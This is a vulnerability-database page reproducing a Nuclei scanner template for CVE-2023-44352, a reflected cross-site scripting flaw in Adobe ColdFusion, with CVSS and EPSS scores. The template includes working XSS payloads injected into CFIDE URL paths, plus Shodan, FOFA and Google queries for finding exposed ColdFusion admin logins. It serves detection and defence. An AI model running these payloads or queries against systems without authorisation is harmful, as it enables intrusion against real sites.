Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-44352
HistoryJan 12, 2024 - 11:55 p.m.

Adobe Coldfusion - Cross-Site Scripting

2024-01-1223:55:49
ProjectDiscovery
github.com
43
adobe
coldfusion
xss
vulnerability
unauthenticated
attackers
javascript
2023.5
2021.11

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.9 Medium

AI Score

Confidence

High

0.006 Low

EPSS

Percentile

78.8%

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser
id: CVE-2023-44352

info:
  name: Adobe Coldfusion - Cross-Site Scripting
  author: pwnwithlove
  severity: medium
  description: |
    Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser
  reference:
    - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-44352
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-44352
    cwe-id: CWE-79
    epss-score: 0.00931
    epss-percentile: 0.82639
    cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 8
    vendor: adobe
    product: coldfusion
    shodan-query:
      - http.component:"Adobe Coldfusion"
      - http.component:"adobe coldfusion"
      - http.title:"coldfusion administrator login"
      - cpe:"cpe:2.3:a:adobe:coldfusion"
    fofa-query:
      - title="coldfusion administrator login"
      - app="adobe-coldfusion"
    google-query: intitle:"coldfusion administrator login"
  tags: cve,cve2023,coldfusion,adobe,xss
variables:
  string: "{{rand_base(8)}}"

http:
  - method: GET
    path:
      - '{{BaseURL}}/{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm'
      - '{{BaseURL}}//{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm'
      - '{{BaseURL}}/{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm'
      - '{{BaseURL}}//{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm'
      - '{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm'
      - '{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm'
      - '{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm'
      - '{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'action="/{{string}}"><img src=a onerror=alert(document.domain)>'
          - '"{{string}}"><script>alert(document.domain)</script>'
        condition: or

      - type: dsl
        dsl:
          - "contains(body, 'ColdFusion')"
          - "contains(header, 'text/html')"
        condition: and
# digest: 4a0a00473045022100ce96a082d0f000c92096a33e4c6682786c68f87204e8a007899a3aef0e64e524022051ee6b38721b584430ceea3db1394145a5708f8e91860151f52b4146a67b6992:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.9 Medium

AI Score

Confidence

High

0.006 Low

EPSS

Percentile

78.8%

Related for NUCLEI:CVE-2023-44352